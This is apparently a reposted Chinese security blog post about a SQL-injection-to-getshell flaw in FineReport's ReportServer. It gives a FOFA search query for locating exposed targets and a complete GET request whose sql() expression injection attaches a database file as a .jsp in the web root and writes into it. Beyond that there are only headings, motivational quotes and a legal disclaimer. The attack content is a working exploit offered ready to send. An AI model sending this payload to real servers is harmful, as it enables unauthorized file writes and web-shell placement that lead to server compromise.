漏洞描述
网络测绘
app="帆软-数据决策系统"
漏洞poc
GET /webroot/decision/view/ReportServer?test=&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fuu9iu.jsp%27%20as%20uu9iu%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20uu9iu.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20uu9iu.exp2%28data%29%20VALUES%20%28%27Qax360nb%27%29%3B'),1,1)} HTTP/1.1
漏洞检测与利用
工具获取
🍻🍻🍻
🍻🍻🍻
不要等待机会,而要创造机会。
每一个不曾起舞的日子,都是对生命的辜负。
成功不是终点,失败也并非末日,最重要的是继续前进的勇气。
不忘初心,方得始终。
即使前方是迷雾重重,也要勇敢向前,因为阳光总在风雨后。
今天的努力,是为了让明天的你感谢现在的自己。
人生没有白走的路,每一步都算数。
梦想不会逃跑,逃跑的永远是自己。
生活不会辜负每一个努力的人,时间会告诉我们一切。
心中有梦,眼中有光,脚下有路,未来可期。
失败只是向成功迈出的第一步,不要因为怕摔倒而停下脚步。
每一天都是新的开始,每一个今天都是最好的礼物。
世界上只有一种真正的英雄主义,那就是认清生活的真相后依然热爱生活。
人生最美的风景,永远在路上。
用心走过的每一步,都是生命的馈赠。
原文始发于微信公众号(南街老友):帆软FineReport报表 ReportServer SQL注入getshell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论